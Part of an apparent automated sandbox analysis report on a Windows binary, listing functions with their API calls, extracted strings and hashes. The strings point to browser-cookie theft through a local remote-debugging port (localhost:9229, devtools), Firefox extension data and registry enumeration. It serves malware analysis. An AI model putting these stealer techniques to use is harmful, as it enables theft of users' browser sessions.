                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 51d4103dba7f40e263072de8ef199cd5d5d23c29758d5c1e1f41b3446fdd96d1
                            • Instruction ID: 69006cd8c4dbe9a46ee860105a4d1956d288bb269bd7d2b49bfac6a8e50c96be
                            • Opcode Fuzzy Hash: 51d4103dba7f40e263072de8ef199cd5d5d23c29758d5c1e1f41b3446fdd96d1
                            • Instruction Fuzzy Hash: 5F912FB16017029BDB21AFB5DD88B17B7EDAF04345F14642AEC86C3262DBB8DC45CB64
                            Function 00444760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 004447C5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444812
                            • lstrlen.KERNEL32(00464B60), ref: 0044481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044483A
                            • lstrcat.KERNEL32(00000000,00464B60), ref: 00444846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004448A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004448CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 004448DC
                            • lstrlen.KERNEL32(?), ref: 004448F0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444931
                            • lstrcpy.KERNEL32(00000000,?), ref: 004449B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 004449E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444A5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: 27af6d05f36eb49785d153f355483e8de7dd027eb47d723cec85c8ec668e30c7
                            • Instruction ID: cc783268617a99aae7fafaf0e35273e2b572864aea91a614f5df3ef20933fdc6
                            • Opcode Fuzzy Hash: 27af6d05f36eb49785d153f355483e8de7dd027eb47d723cec85c8ec668e30c7
                            • Instruction Fuzzy Hash: 24B1C271A103069BEB21FF75D985A9F77B9AF88304F04502AFC46A7311DB78EC018B98
                            Function 004392B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004390C0: InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 004390DF
                              • Part of subcall function 004390C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004390FC
                              • Part of subcall function 004390C0: InternetCloseHandle.WININET(00000000), ref: 00439109
                            • strlen.MSVCRT ref: 004392E1
                            • strlen.MSVCRT ref: 004392FA
                              • Part of subcall function 00438980: std::_Xinvalid_argument.LIBCPMT ref: 00438996
                            • strlen.MSVCRT ref: 00439399
                            • strlen.MSVCRT ref: 004393E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00439547
                            • lstrcat.KERNEL32(?,00461794), ref: 00439559
                            • lstrcat.KERNEL32(?,?), ref: 0043956A
                            • lstrcat.KERNEL32(?,00464B98), ref: 0043957C
                            • lstrcat.KERNEL32(?,?), ref: 0043958D
                            • lstrcat.KERNEL32(?,.txt), ref: 0043959F
                            • lstrlen.KERNEL32(?), ref: 004395B6
                            • lstrlen.KERNEL32(?), ref: 004395DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00439614
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: e4e5c513bfa644d40950597544d9db6c3ff2db99ee1b61a24c92cbc96b63f7dc
                            • Instruction ID: 844465d1d329cbabdc2f397ad3aaee4baaec72de462af9c95c4ded4d956053f1
                            • Opcode Fuzzy Hash: e4e5c513bfa644d40950597544d9db6c3ff2db99ee1b61a24c92cbc96b63f7dc
                            • Instruction Fuzzy Hash: 20E14B71E00218EFDF10EFA8D981ADEBBB5BF48304F1054AAE509A7241DB789E45CF95
                            Function 0044D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0044D9A1
                            • memset.MSVCRT ref: 0044D9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044D9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044DA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 0044DA1C
                            • lstrcat.KERNEL32(?,00FFF2E0), ref: 0044DA36
                            • lstrcat.KERNEL32(?,?), ref: 0044DA4A
                            • lstrcat.KERNEL32(?,00FFDE70), ref: 0044DA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044DA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0044DA95
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044DAFE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 4ff6637dbd91d5f2fc7d36614ea7a705db944b521a84cd1d715582c33e838d54
                            • Instruction ID: 133ff74a1c25b3dd11ce50746ee86de2c66a982c080ea60f50b6a37701929d5b
                            • Opcode Fuzzy Hash: 4ff6637dbd91d5f2fc7d36614ea7a705db944b521a84cd1d715582c33e838d54
                            • Instruction Fuzzy Hash: 46B1BFB1E00259AFDF10EFB4DC849EE77B9EF48304F14556AE906E3250DA789E44CBA4
                            Function 0043B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B3D9
                            • lstrlen.KERNEL32(00464C50), ref: 0043B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B474
                            • lstrcat.KERNEL32(00000000,00464C50), ref: 0043B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B4A9
                            • lstrlen.KERNEL32(00000000), ref: 0043B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B587
                            • lstrlen.KERNEL32(00464AD4), ref: 0043B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B622
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 0043B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B65E
                            • lstrlen.KERNEL32(?), ref: 0043B767
                            • lstrlen.KERNEL32(?), ref: 0043B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B79E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 4651a1d7e68314b18f5efed99c99bc0416a125ad50b3d2b36f21bea2634ec05a
                            • Instruction ID: 77f1e236e75c2b93d8e531d81bcd1b7829816563264200b2a7ad5c8baa431fbb
                            • Opcode Fuzzy Hash: 4651a1d7e68314b18f5efed99c99bc0416a125ad50b3d2b36f21bea2634ec05a
                            • Instruction Fuzzy Hash: AA026170A01201CFCB25DF65C949B6AB7B5EF48308F19A06EE9059B362D779DC42CBD8
                            Function 00453760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • RegOpenKeyExA.ADVAPI32(?,00FF8A30,00000000,00020019,?), ref: 004537BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004537F7
                            • wsprintfA.USER32 ref: 00453822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00453840
                            • RegCloseKey.ADVAPI32(?), ref: 0045384E
                            • RegCloseKey.ADVAPI32(?), ref: 00453858
                            • RegQueryValueExA.ADVAPI32(?,00FFF760,00000000,000F003F,?,?), ref: 004538A1
                            • lstrlen.KERNEL32(?), ref: 004538B6
                            • RegQueryValueExA.ADVAPI32(?,00FFF7C0,00000000,000F003F,?,00000400), ref: 00453927
                            • RegCloseKey.ADVAPI32(?), ref: 00453972
                            • RegCloseKey.ADVAPI32(?), ref: 00453989
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 6a8cd8aaf8c3e25a233807b92497ae08a7e935d293b6c1ebd963171fa4df174d
                            • Instruction ID: fe769da1081a1e346a135e8c42e365c4ff0f6d35f2583c1e6c9ff788c34c551c
                            • Opcode Fuzzy Hash: 6a8cd8aaf8c3e25a233807b92497ae08a7e935d293b6c1ebd963171fa4df174d
                            • Instruction Fuzzy Hash: 0D91D0B29002089FCB10DFA4DD809EEB7B9FB48315F14856EF909A7212D775AE05CFA4
                            Function 004390C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 004390DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004390FC
                            • InternetCloseHandle.WININET(00000000), ref: 00439109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00439166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00439197
                            • InternetCloseHandle.WININET(00000000), ref: 004391A2
                            • InternetCloseHandle.WININET(00000000), ref: 004391A9
                            • strlen.MSVCRT ref: 004391BA
                            • strlen.MSVCRT ref: 004391ED
                            • strlen.MSVCRT ref: 0043922E
                            • strlen.MSVCRT ref: 0043924C
                              • Part of subcall function 00438980: std::_Xinvalid_argument.LIBCPMT ref: 00438996
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: b9a596dc7de2315be2b34e0a38d4c05a059d1953fdb1373035af5a4480a5ff09
                            • Instruction ID: a67604871ded2a8d7aff25d3b083eb055a375f11c8a922bf5303e783722daa26
                            • Opcode Fuzzy Hash: b9a596dc7de2315be2b34e0a38d4c05a059d1953fdb1373035af5a4480a5ff09
                            • Instruction Fuzzy Hash: A151E671600305ABEB10DFA8DC45BDEF7BADB88715F14056AF904E3280DBF8EA448769
                            Function 00451660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004516A1
                            • lstrcpy.KERNEL32(00000000,00FEA788), ref: 004516CC
                            • lstrlen.KERNEL32(?), ref: 004516D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004516F6
                            • lstrcat.KERNEL32(00000000,?), ref: 00451704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045172A
                            • lstrlen.KERNEL32(00FFEBF8), ref: 0045173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451762
                            • lstrcat.KERNEL32(00000000,00FFEBF8), ref: 0045176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451792
                            • ShellExecuteEx.SHELL32(?), ref: 004517CD
                            • ExitProcess.KERNEL32 ref: 00451803
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: 527ab3c0cf6539435440647e7c18eaa8e987ed53de8605ed089d586a30397727
                            • Instruction ID: 73aee0027fb41b861800cd232a8da2f768f18ee1d0c1e219787420f3f4bb1b7b
                            • Opcode Fuzzy Hash: 527ab3c0cf6539435440647e7c18eaa8e987ed53de8605ed089d586a30397727
                            • Instruction Fuzzy Hash: 2E516070A01219ABDB11DFB5CD84B9FB7FEAF48301F14512AE905E3361DBB4AE058B94
                            Function 0044EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0044F026
                            • lstrlen.KERNEL32(00000000), ref: 0044F035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 0044F053
                            • StrStrA.SHLWAPI(00000000,?), ref: 0044F081
                            • lstrlen.KERNEL32(?), ref: 0044F094
                            • lstrlen.KERNEL32(00000000), ref: 0044F0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0044F0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0044F13F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
